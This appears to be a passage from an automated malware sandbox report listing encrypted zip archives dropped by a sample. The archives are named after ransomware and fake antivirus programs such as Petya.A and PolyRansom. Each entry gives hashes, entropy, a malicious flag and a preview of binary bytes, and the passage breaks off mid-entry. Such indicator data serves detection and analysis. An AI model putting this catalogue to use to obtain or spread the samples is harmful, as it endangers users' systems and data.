                                                                                                                                                            Preview:PK..3...c..L@....M....z......Endermanch@Movie.mpeg.exe......AE........b...../.....JXU....G.]8..Y..:...;..].d.*......w..cd..69E.H;..`L...,..B......&X.......s.K.T.......C_&..c.%.0._`..a..#....`..7:.Vm.k&6..|$.Q2SCah\r._...^L.$8r.:.r.!......g.l].....6.....,...M..my...~.#iF...6.d/..*.\..4(+ia...VSI>..........x..G.Y5..../..HR.......+.........."$....:.O.R..>.s......]~..T.g$.. ....,4..9..JQ.~.$..c.F.L......H....i.1....V.i.g...z.#.]..b.....@.f.....4OiI..B.O.....\....k../.Tz....M".d..U...jQ(....-.A.jA..s..4.......A`.L...r.\..7..V>......F.y.y....D..d...H[9.S..'.4C.#.gB..WP...U.)..f.$h...6@[.5j...84m.Fc4....><&..O}S.W....IB.o..b.^+W;V.l.x..S....g....a..Z.w..m .@)...-.&.w......mg=^.c.1.%<n.CU.......aN..r$. 7...._....0...D[Mr.9.}............+DB...t.9(@.>f......m.kO......e.|.f.W......:.9?zL.Rb....,...bU.)Q.R....(%..."..3)3....N...M.0.m....sPPt$...`...E.......E.B.....:.....R.........1_qar..y..?..(..A>.....%.......;..fW.V.E.2.+.r.s.?.r.W...@.I.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9761692
                                                                                                                                                            Entropy (8bit):7.999976737620723
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:196608:RIqrrCcUdFJp1YNYbsVNCpsF98DOV9Qz7FFEClC6j2LzfFXkoZc1kXa:FCcUdFX5gNL8oQz7FFECl3j2ffF0L1Ua
                                                                                                                                                            MD5:B05E1B131299F3D57323BDCA54B00570
                                                                                                                                                            SHA1:82EBEB46687E7B285F588C056E52CCAAB87E464D
                                                                                                                                                            SHA-256:3ADB8147E461A11ADD25101D78205B61B54B6993022C8014B9A55B3197CA39C9
                                                                                                                                                            SHA-512:35580E1580CC2DC5A50AFDB1E3453517FA3955F7737C177A83BF2BBB9D000A7A5F060B032200E0440C4478400AC8B1788E018FC7C88ED150B96282146E2F2457
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK........F..H..............Endermanch@NavaShield.exe.m.."Q;~&.,.....y...[...W<....n&S28$.L2...c..k.Z.:._ .}..l....O....R(..Q:L....re..o...S...q........1.......Q........%.e..g0....n..H{.o.A...~.(.tV#..v..}Sz......e...a.AS. ..x......EX%BT...)......D.|>A....Je.Q`[+.g.;.o.Kw.k.......V....ObC9.v*`....E..-.GwX7..6...j.*gd...@S..E;.O......k..o...m.C&.[..H.s.}%@...........dGG..<.-.<rGTo.....-...L}....W...:.gq......w.9..U..<....'..8NY.?...R.H.AN8j....e.].....c.j...g....ZWk.0.ny.6...n...B..j.^.g..4..6..R.<0[.bN...$..`..d.R.9.l.).f.K.0.d.Y..R..../.F..y.:.A.%...FaC.{...n...w..BZws.................%<.p......'@.Tavg.1...<.(.cFE.I..:.5..._.j'O..%.5q...../<$z.~...|inI....f.~^.<(..D.;x...&.r..)O...\....!..E...`C.s..-?.../..w.d.|7....,.<p.|.f.....s.T....-...{.H`....6.eE..d.WR&..p.".....K.fKG.m.a...........TV[..`..a......6.jl.3D!W..M.[..d<..k.y.... .i.|8.v"..Ka......'.@...%...d...M".....9......l/=.6..I...pv.a..f...\..F.-z.B...*bJK.W.i.H...) .4.P@...G...*..p..jRk.y.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):938498
                                                                                                                                                            Entropy (8bit):7.999770835729866
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
                                                                                                                                                            MD5:F315E49D46914E3989A160BBCFC5DE85
                                                                                                                                                            SHA1:99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
                                                                                                                                                            SHA-256:5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
                                                                                                                                                            SHA-512:224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe.&P....\..J..vt.D('..i...!.}..V./.d..i...^..j...V.......dk?..o#....}.6.F.......IZ+.~.H.l.o.....z...r..TJ.^.1.7..b&B.@.C.....)...34]...~...m..Y...}...P.r...>.z.....".4T.>.........\..?..E...z....G...u..4...;"..;8.|.....*...Z.k.4....G.V..x.Si.%...K..Q.6.......+Y.?...m......{,l...Xe....C/W..$...j.,(....4a .1.'..f...3lG8.{..z........H]..N8.H...%g.....V.`.y..f..Y...Q.l....=*....p....x.o.".M%...L.fc......Z..".C.`.oU.......e.......S.G.n....L.j@..Y....^......E$..l.$...&......4...h...x.9U....d..9..-i.zt7.>....hJz...=.......p..1AEd....O..y....m..6.[.8 3..u..q[.i.K..d.a...H4*.]....#[.....=.....y.Y9......K_L4.7.....Y.@..}.T../.B.G.&`.......s.,.iQ.P}..O'~..5e...L..~......x'M..l.<.x.s}|....Jq.........Sv%.M.Q.!?....L....^24<..eP]..*.crf.&.....J.o..;.w(..5]..>.Wc x...R......J.X.>.XTU....".....p...[..v.E...V....~.....<...K........Lfm`..3M?....G.....J5.d..~...a.#...1......i.@6..?.c+.....?r'K..0.~...L.s.[
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):808324
                                                                                                                                                            Entropy (8bit):7.999786964776398
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:btiUqYRf3p96/VG8K8LtegdCDUcbdbbUJ9rV:btipYF3JategwDU029rV
                                                                                                                                                            MD5:CAD618323B07C0F4F6273AE08DF1779E
                                                                                                                                                            SHA1:E67715F81F83CE7CDA32F12A116CC950B6FD0DAC
                                                                                                                                                            SHA-256:854113F2737EE276BA34FAC399E8A615E4DE4C712DD7A761AB0E198FA09D87FC
                                                                                                                                                            SHA-512:EFD9403706ACCFE996B5DF58300B5E0A0B461727BDF7C5492E9914369FEF09AE06CDC2D00D30AC6D494FC68DADCF423D800741F7C22D5C1D565EF3FC675C4565
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........'=..h].T...r......Endermanch@PCDefenderv2.msiq...AQ..).&...6..!....FH...v.....o...M:......G.d>o'.W.i..d.....u.\....{.A......C..j..7..S:...P..'..+'. .5...I.W.[...m_O....=1*..Z..Sa..A.....K.4.......k[G..y..how..n....D.xN......Lr3U2.G..k6).=.3.0.{...i....u.{..........JOwA....RYib.CM.%..R.K^.P.$i{NO..C@X...t..Y'}.<.....q. .n.....*x0..)..*..u.l|.T."..j.E%.ffarZ...v...W!..Pp....~'.B...No.Z."..l?..g..'..rZtB....L..L......@.N..'t..81:...'......m.N..;...);....Y.{nV......g|P..}..g../.9.va?iM]"..a..'+.j.D.?u.}..8..3....v....F.;..'..-G.t(.W..uC...4.....Q0..d../.....j,$.V.....8v....pbR..G..w.....{..'...\[-.....-..Q.Y.U\.+.W.G.........<ce.O.b$M...&..d..z...8.-..o.r..Q...., .C.e.k...b..`$)]w-.l]....h.......U.....2..+...........@..D9..U....,..I.0.......b.|.}..@..bP\H3.z.....4<.{.].F....:BR ur..>....B{..K.,0v..p.....i.9........%+.M;$...H.........y..rvq.2.Sj...I.....W...Z8..0wU.z...0.Mb=.r....U=....)..0..f.]J...`_..I1.}...`....#p.h.8hs.8...n\..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):857943
                                                                                                                                                            Entropy (8bit):7.9998266762101435
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:8PihE4O3RN9DzQwHCP1cxm6JmZ/T/Jybru:sihc3RrDzJCP1ISZ/FKy
                                                                                                                                                            MD5:C2C0E8A4B2790140EA1AAE223669C48F
                                                                                                                                                            SHA1:664A18B5DB524FAD9E43DF2B9C3C0577562082A7
                                                                                                                                                            SHA-256:B23ECCB36868753A1131A9A6B88B33324B3CDD7E232FB80CB5DF4E2994F5A9E6
                                                                                                                                                            SHA-512:DF22757F866564887154C54A053F919F03A27CED1446B95979B02B8960EC499167F6E9C3A1F76E8359AD044C8A5ED2C6ADDC4874A712F75726A24D3029A8587E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........nv<.e..............Endermanch@PCDefender.exe.?.....r...o......4...I...0.]...u9...\.....sN.DK@../...a~[.%.@..n....}..7......t...;..0=....|.t.......l....8..!.W.....#.q*B...{..S.,.y.......,...2v..A%x..<..{.nQ....S>.B........$.b(H9.H...BI.u...b.r[k.4..0..Y.......'.I..B.<.-p.E./j.%LE.0a......Q.M.g.{.F.k-.O..F.[...(B.yx^......f]'.jg.R.O..G...5A.&/.{XC...B+?..E.r..=.rX.n 7...y.]n1.2..;2....l..q..;....iR.0Z..0|.j..<w*.k.S...:..(E..3...3..3..ua.y&.kJ.9;P...Q..K..|..l?.c5E.+qm.I."..'*.<.i...d.0B....c.Y.e@.Z.......B.`^.....t...;.S..(...(....un...su..BSg...O...+P.pf..=j0q.Y...5..i.UY.Q..V......A..v..F.#F.I*./.....Mbn...J..?x..R.d`.:........OQ....9..}.'v.L..>..0..+...b.e.1..w....i..S.l.....((C..%R.f...r..h.0 .]..=i~N..jw...I.....z.=..u.tlnW...<./......1O"n..2|.zE.F.C...Ah.8'..|.h..^.F.h.H...h..?.1.....t.D=xEo.6.580>..Z2..j.w.......D...o#bh..(.....#.S........n.@^m.#../.p.~d..c.J..=.<Et....n...%........XeO.Z}...]%.K.........8xk`.CmIV.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):131293
                                                                                                                                                            Entropy (8bit):7.998685171989688
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:7P2YmowJWNmYv5lnTc8R+igbpBgBXtzXW4Dg/PJLDEuUYBAald:r2YnzNmYBlI8hgdBgBXpXxDg/PJLDEH4
                                                                                                                                                            MD5:1559522C34054E5144FE68EE98C29E61
                                                                                                                                                            SHA1:FF80EEB6BCF4498C9FF38C252BE2726E65C10C34
                                                                                                                                                            SHA-256:E99651AA5C5DCF9128ADC8DA685F1295B959F640A173098D07018B030D529509
                                                                                                                                                            SHA-512:6DAB1F391AB1BEA12B799FCFB56D70CFBDBDE05AD350B53FCB782418495FAD1C275FE1A40F9EDD238473C3D532B4D87948BDDD140E5912F14AFF4293BE6E4B4C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........t.I.w.H+...........Endermanch@Petya.A.exe.i?mj.P.........N.d|....>.c.....%..N.....I....7{.F.O...2.wT:..g...dg...{._:....`.....L...jR.0.d,...5..!....*u6...N.n8..R..{.d...|.{.........[.....y.f..!.f.A.........nl...}...@.....X....6.....7...o...(:\....D.N5.h.Y...78&...U....EA......A.5l...[......_6'..F$...[.~qut...X>1n..4.S...~.[._|/..n...#....j5......N...Y{WwD..%s.Vo....T7Wn.jIRq].*!..Ky...la.-^.}..j.s^^s..._.....r.E.........9E%NK?..%.....IGf.y.....<Ok.E._(.sW.G..O.%.)`.Iam..b.j.l.g..~.W....|...c.L.....k0...a...`.q.sls...........1.p.....^....TRq}..0?...:..VU...#a..+.1f...9(....0.+\}.j..~.0.#.De..mk.$......X..1.......p....q&.._.<.j..e..6/,..D.G....c..v......47..jd...q.....eb.z.........x.W.h.M...M.8.x;....<$StHq....k..AP7...k...........X.5m..O.%S.Y....?m.6.J.#...7s..=.4.*....p^g.A..y......3P;.=C.mc.id.n$..D..np..f......_nQ.W.J..+.a.....s.l...;@.2.,B-|W..,.......U.r..n..WB...2..@SE=..A...V.& F.wy6.q....O$...z=6..*.....+nD#....i.C|f.-...~^?...
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):133759
                                                                                                                                                            Entropy (8bit):7.9985193464243505
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:veAhzA234eL3kq97n2PxqzYwiYjeKPdwekrkb:veEhJ1keyKPz
                                                                                                                                                            MD5:7A5AB2552C085F01A4D3C5F9D7718B99
                                                                                                                                                            SHA1:E148CA4CCE695C19585B7815936F8E05BE22EB77
                                                                                                                                                            SHA-256:ED8D4BB55444595FABB8172EE24FA2707AB401324F6F4D6B30A3CF04A51212D4
                                                                                                                                                            SHA-512:33A0FE5830E669D9FAFBC6DBE1C8D1BD13730552FBA5798530EEB652BB37DCBC614555187E2CFD055F3520E5265FC4B1409DE88DCCD4BA9FE1E12D3C793EF632
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........yE4C.......p......Endermanch@PolyRansom.exeX.......%Q.......C.....]V.\.....#.X...z..K.'.uK..7..Gd%._u.G5..0..).Nz.h.....%._..TE....)..H....X.b.(.%]]D..."..0.|5..).G.-h'q.:...}b.1...:.^..d.d.t...9...iY+.....f...!.fn.sk..UG(......b..Rn_`....l....7W!...P.n{.....F...`C.'.....N...i.a..kD*V.XH......2....#...t.p.=..v.ykKDF..>..d.....4=.<.1..k.a...W..V:....m.1..g...U....l.s......../...3a.*.....TRG..N... ..Bm3.!.k.m.!..RIrjR;.^.n.....#.sW..lP4..!F...MR1..W.....u...@ ....#..[J{..U.....a6.fL.......HU...v-..<.HU ...jy.;..=........<._3..GP .%..(....K...s..%.....s.. .....Vb.N,.<.... v.(WM...j6.5.N..m....XzTm...$......[W..%!WY_......QAp..Y...#.3G.....b5...>......&.2.....&.QS.w.D.`...PF[.!.. ...h....-...`..?N........z...%.|..nD,VdW*d7....XC.(l.....+..0Z`................Ug..(..4.4...s.Zh.m._I!.f.6.|...-..aB..~iid"o. ...c..N.)..y....x..H....#|5.N...N..r..h..-c...>&v..d~e..9.A..(...2.6.?...;....D....-..w..~V..........U......$..[.(o*..........T.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1070715
                                                                                                                                                            Entropy (8bit):7.999811036564782
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:8Ssy3ly84sw+6ZL/8Hexx58oBiNkNHaIW:8Svy/D8Hexx0Nk9K
                                                                                                                                                            MD5:7958E5251E5E6F9C3B7752FF1543E28A
                                                                                                                                                            SHA1:86F6A8439CE6A6B30E6347C5BDE7E091E5FAD0AC
                                                                                                                                                            SHA-256:B31C3F9D08337314050552A7DFDCEAF42BB6D22BAEE287CDE6238A6D965D87CD
                                                                                                                                                            SHA-512:AEC50B136792AEBBD5AA8E5D316C39B728FF28E411DD54DB99A18D5C7B9447F25629C4220800EE8DD8CD2B24A98A11D46F32B45A62BDA5135C2FF0A731E032EE
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c..aUM.....U..p.......Endermanch@RegistrySmart.exe......AE....!.J|..L.6..X. ."/,k.p.\9|....5~.....*0....:l....s].O.=w...S..[...).P4.....8....G..^.kFb..].]..u..5..<m./,v.3....e.U../k.i...0..4....&.......... ......`..tu..a......]K.0...A,.#sz!.cA....<>qq@9....P.X..........xX_...M...OE...y#MC;.!k@.r..Z}......c..ml...gd.-. n.`..v.Y.'..K.%:...?....*G..r...Tf..;....... eb.Y.J..........&V.E"A..[7.-....eo....P..7.h..gn..E...Sz......'ndO./.?..Z..o%u....y\..>.K...... @..0.^?e.jO.vdj..B..|.I.E.,TX.W....x.y........%.....E.....&..8..J.<.U.:..I.....o......{..3.V..Zx!.o._Jo.}..a..F8....k......3^.-....J.|A1....B........2...........js..8..|['.>....Sz.M...?.....@..Jl\<..@jme_..T..b..0....] .y.j.d....h.....Y....*.7.$,.............I.7+;..[V.....P.......z..93Ql`.ynC.G?..?..gd..HJ...4.ot.y ....U..PT@.0.7...g .q.@z...R.n.;..G.,t..V.....~.s1#.6Y=..8.......=.......3.#.m..q.Z$.3Dr<..i..$.k..z.t..=5...R}*...q8.l...0..).&.j.2IU.^d..zsX......@P.C...B..Y'...(.>..._.`..:..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2265879
                                                                                                                                                            Entropy (8bit):7.999920263279079
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:49152:aipCYzu1VcZeM5OyrAh6wXiBqOX0aawWqjPrQZRD9qgUBZZmpUVt:aae1eAh6aYjPrc9q9rZwU
                                                                                                                                                            MD5:5027CF25B38424D573321079BF190B0C
                                                                                                                                                            SHA1:A9E02136626B18D7785050A89DEE00A328BEF946
                                                                                                                                                            SHA-256:1CE3143DC4DAC71824B70DE90C3DB942C9DA15D450A4912871ADE10076CD1E8E
                                                                                                                                                            SHA-512:4B1E16E85CB0522346238B39124DDFF074280CED6AAF6E11937458F7309ED366DEB1267D8A24AE4D6B6A540325BE93DF31DE55F62E4892F1E5740B8A932FF32E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c.f..C....Q."..v&.....Endermanch@SE2011.exe......AE.../4..Sr...(...D.>n.\....U.mJ..|?....#...Ya....5.)..#<.$.IQY..Un..*. C.v..!F.^..K...Vy*.i?"`.....>....U...#.b.Z.v.....%..6.....7..&..&.J.1.>l.1.s].K.......~.9.2.L....N.._._.^...3....e.:.V-..Qk..rZ]T..Z.#.!e...W.+_.E1.#.vT.\.O]{.&.4...k...(.#u..q.v8.:...wa.{.e......w.......h..q7<M...21vu..1..`./...c.....D.V..?j.E......lX0E0..OT..N...%.._.06UP.#..h!...Mn.....G.f.1............z.N..,%0.{m.Y..aC.....e.I.\.2...T$..c..!..)n..9.I.:N54.s..{.k.8...[......c......rd.Sg.e....P...o:......X.'C.........r.[..A../.....). .W.8)H...xK.;.@.6....$.8A.WM....7i.F8...f...nv,.,.d..XJ.x..'.<B.d..~D.......c..i...F@..h\...K...+..:.....yO......Y.q}.#..Y..YE.L..>a..u#..#G.(:...@.c.s..>...-....[.V..V.0.z...XT..a..b....C..us..D...R.........~.....G..!..p`8)/..1h^m.......q@.:..^.....!...Y.T.!.;..+..=.+......v.v...u....?.$.E..9...E.b.\Z.-.l%0...K.~..&C.j.1G...[.Rz.C.N...p...S....d.....8.w-.6/.......,w..g..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):904153
                                                                                                                                                            Entropy (8bit):7.999807302196412
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:+EH0fyd4HKpzkOSWV6Lgn+DRGEZGXDyg+6:DRd4qpIOSWVYg+DUNzL
                                                                                                                                                            MD5:32E630865A498A6FE5BF4D8DD593DCCD
                                                                                                                                                            SHA1:05217C896A53C77C7F751DE72875A7315232C293
                                                                                                                                                            SHA-256:62243C2840D5FBEEF1CCE73DBE4929727AFE174968B91FABA3848B89AB550D7F
                                                                                                                                                            SHA-512:BAA4BA5E61406848BCD2683FBD8D480C0AB22954AF9B9933284DFC4FB2E9361FE0244EFAE3CE9D171B5510B8030BB510FE788D8AE3FE476B29FC8CEA815AC244
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK........PD.E./%......"......Endermanch@SecurityCentral.exe..9....(....I.;x.xK...v..0.k=...;...eWw6....K.X.PV.^.&b...IL.1.....0O j*.I...n....y..b.,...x-...Q..8......(.p2..'.z..M.f(..R(.t.W) #.......}...5..K....Qg.....{..X.JD..y.D..).\....T.....H.d.I.Pz.M.\.h}.c....(Q0DD..l.&..5.a.._.Y....!..2$..]....I2../6....}.u.....A..q.H.t.u.....t.H...FS..a.>...g.|.z._,.IEtk..7$A...Sj.'.K.:.H....z.`..R.M4.O"..b. \...M....u..ljaESi).m.b)....g..RSS..\E..D.......4..L.1...g....1.%...J..s).........ST..IX.....c.0...=..8c.X....W.yn...n....[1......W2.L......B..._.d..Y.>........`......"....-.eD..:dM...p'._2*8.H...R..y?...G..^....4..eb....H%...>...A......8.....`..T.$..;.c.c..7.T..7.1...M:.7>....}..@..H....}V+.V,Z..=>.f@..-.&.M.....^Gy......q>..|6V<...Pe..o.w.3..H.GP......Q.*.....0..Ts.....&..)F...HT.,~....tLi...m...6.>....RB...mt.ma......01..kZ..6~..!...^./3.7g..3bV(..4......SU..?..$U..kV#L..bl....P.....,u.X.A.-.Y.Y....%|..e.r..>._X...edE....('. .,........ .~
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):470947
                                                                                                                                                            Entropy (8bit):7.999621239588262
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:43DuMOagxhLiZEfyNX/rFLzXqBaW71tc99onYZ:vog/LiZdX/p3icXon2
                                                                                                                                                            MD5:1E23B530FEFBF0E4C6696CE8A0874081
                                                                                                                                                            SHA1:585AE1E314118BD4CBF15D2A66A6B708D2E46735
                                                                                                                                                            SHA-256:5DAF5731D28583A37A7D574D1D32CA89E2ED2DCC448CF0EBCDC6D43BC4981A92
                                                                                                                                                            SHA-512:2312469EB3FB93F311BF28C14D2F5AD39E3DDD3AD4AA19306F8B276D4F401972FDC5E7659F388C08DACD739A8162B05D06E052F4342EDF1C1DD9AECDC32560F0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........0G.w......2.."...Endermanch@SecurityDefener2015.exe....H..[.R..U..rP.&........3.....95...Vv...$.Z.{...$..(#}...}Y%.....*.....5b../y...V..K.\K+..P..@.....[...kAg....Vtv6.....@..M.cI..'.f.HJ.x..v...@C.....z.. .].P.^..Fy.......&Q..h....0~..I..+jI../B..t..&|..M...F.....j..l..*....Y......Bo.......8.P.A...a.M.~):a. ..6....R..l`=.m.b.......V..qxo....y.I..bo`]..P..$.'...Gs.i..FE... .8n.F.F....I..'..(p.;F:..yM"n...PP.P....m...K...../.[R.....ctF.P.5j........f........6sSi.G..'.*Ba.iQ.4J.V..abt.9.}.:.....!....w7.c\..=..%!..dni(G!X0.....G0..)..Qu".....w....kpH..?...YA....l..0@*].W...u...L.....$...j..$..../..=S7...\.0.o....1_....1.......?V$....,.e..c.-.. ..."..5.G..s.duP.8\.r ....@^..X_S..r..>3.0...M.O......Q...4...p$.....m....qh...)Q)..s.....N..N.[z.Rh....A....~.=U.3?._g.W...yyG.EN.r.u.B...b: ...5...:.|..D...Q...."11.{4.gv.w\[o..6.$Q...[+S..gx..}.2..OJ.....:.a..zT.....0..).!z.Q....e..f=.F..M.V.[X.....#T...S.#..Ad(A.y.<(..........z..s...%|c..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1423299
                                                                                                                                                            Entropy (8bit):7.9998682090292
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:Ca/D9aMH95/yTCjrz6oOzj0afgIN5j6sXTRzdi9IR7749FJsNk+:dL91Hb/lGVzN1Tfss3
                                                                                                                                                            MD5:F0C0F92E6D444F8D3C60A0B49F642462
                                                                                                                                                            SHA1:30B844E8D96B5B9866E01A6F74C8AC4EDAF75878
                                                                                                                                                            SHA-256:E74925BD172FD72370CA7CCC5C48294E83C56DBC7A9C2EF33C2AC22E19803758
                                                                                                                                                            SHA-512:697C5CAB839DC260CDA851D1D164555CC723449AB00B66EBB34EAA9A91C686424B5042A303CBE500208C34FD7C96C876D7E92506FA36A9CBFF0A9037DD1BFF6C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK...........C..s|............Endermanch@SecurityDefender.exe.hc\.=.cG......K .-uHb..gkJwu9[....$6!I.X.Sg[.$j...Q&...O.Q}..........N9.J!.!..R..Yl#..4.....5..>.....$.=[.fJ"....T_..JB.5a:D......U......x..]30?.......&. ...1.$...P....F..A.$...$......!..z.P...J...g....X.....#.^j..1.....CW.l*"]"....E.}..............p.x.....4}....Lfo:;..n..H..n..y7.G..w.b........W.0.......|...Z..~.,A=.$.(/}.e.g...`..p]......Ry~KOL...u.....h@.{..Qm....6,..".Y.'..-...5)1...N.'...f.....'........1..<3.....x.Pw;q.@X.,..xR..^.......%..V............@..q(..=...{.[!..h.!~.X.....K....y..9.9.4.[$g..{.JC..a|.O+..h.!..%....*.1H.....}..#.............oceg..._. %...>..."..7d.<.vP...5..%.U..)...Nu.Zp.....|.KK...D.K.2.....N...u..d_..4..A...&..........dh;..j?.B..H.J...v.....L.t.....}....*W..s79..kd...3q...p..!}..d..M{m..Vn..N..0..r...)'.....t..5.dW......v.0...b.O..U`.d`...~...LXY.;..IM... ....r.{)r<xj4..x..T_..."g..(......6|.v..%....?..q.$?q..q.......'~5......P...%.6.A"s..Ed@.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2284722
                                                                                                                                                            Entropy (8bit):7.99992877602736
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:49152:4NsjK2ZkFtT1ZuqgtHjs7Rl7ld4PLYqtng/9umtpQ42IC:4SjKl3u1tDs7S8kO9umt6uC
                                                                                                                                                            MD5:D49202312C94A40ACE73D0BC16C7D213
                                                                                                                                                            SHA1:82CC7B285F150E5A4F88B103BCD2D3B1E66CA6D9
                                                                                                                                                            SHA-256:6B172714B9C3DA500DA1C92971C9A1C4A5A8742FDF5DD62BD1A5587740FEFB22
                                                                                                                                                            SHA-512:FC451E431EFCDBEAACA725AF97079DF9E467ADEC3FDC4E3B75C9D80EE6810B6EC595C15F331DC339E7BF486656E5EF8E6A21478E48AB5038C7B04189A6A1F973
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........4>w.\..."...#.....Endermanch@SecurityScanner.exe .r.6..2..N.p.1..Pm. ....1w.......*..7..t].U.Vf....u..t.v...*.)xO.;...`..&.v..Dd.......i...8n.v...^...G...../.e..jV'5>.N.Y.....w.3..'...{...o./H...^..6..'C.....z..g.b.K..L.?4..e...P.3...#..u..h&z..:.3. x....#...n.u=E.l......K*\z..e.7cY..Q...8....i.,v..k.K.vL/......=.E..g...........}..u....RP.!...e........$..E...J.........+..)s._.Y.. ....k.*!o.s.b.G....Ao.TQ...t1.]..1:;.......R..P..{0S.=..%.h.. ..Lh...NHN...U......-..BR/.~]..........d."V..?.ET].&i+..I|..f...Q.(..7T]....f<.r.........x.11...@.......>.\P..m.)....D.......Hy..}4...R..oh....G.,....b.s..tB.....5P.A..E....:a....X.....z8.7...9O.\eT..p1.@O...l..r...1.yI...m>\V.'...*&.0......S3.o..U..N..J...wTI..%..).s..R...`.....M...RH=.=J.E....|..`..U.mN..|q.7..t.)b..7."V..g....6.E.....+....P....3.P.0.|.....=>..q.C...l.2..K...../+.......=]..L.........^.|.f...SS.=.k>..z..,l.$'.D...0I.s&iJ..,.WD".....}.bK]u..4.q..(..e.C^.hA!{....F/...+.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):385789
                                                                                                                                                            Entropy (8bit):7.999536313248271
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:MdZTQDqwhWbeXTbAf4KINkYLcwpO/ZuY2EwbJ2Fgzz+n6tBN+Pz9BQBa4oQRMgs:yZw1DbAf4KIqM4cewFQ2z+6XNk3QVRM5
                                                                                                                                                            MD5:541D8406002AA2750A2CF59480E71D94
                                                                                                                                                            SHA1:AC40C4715CCA6967E2AF789CEE246B5A0D533A9F
                                                                                                                                                            SHA-256:DDF1B79F563D94BB3DDB46B37AA010D95403DC7A1DEBFC9476A8AB449472B738
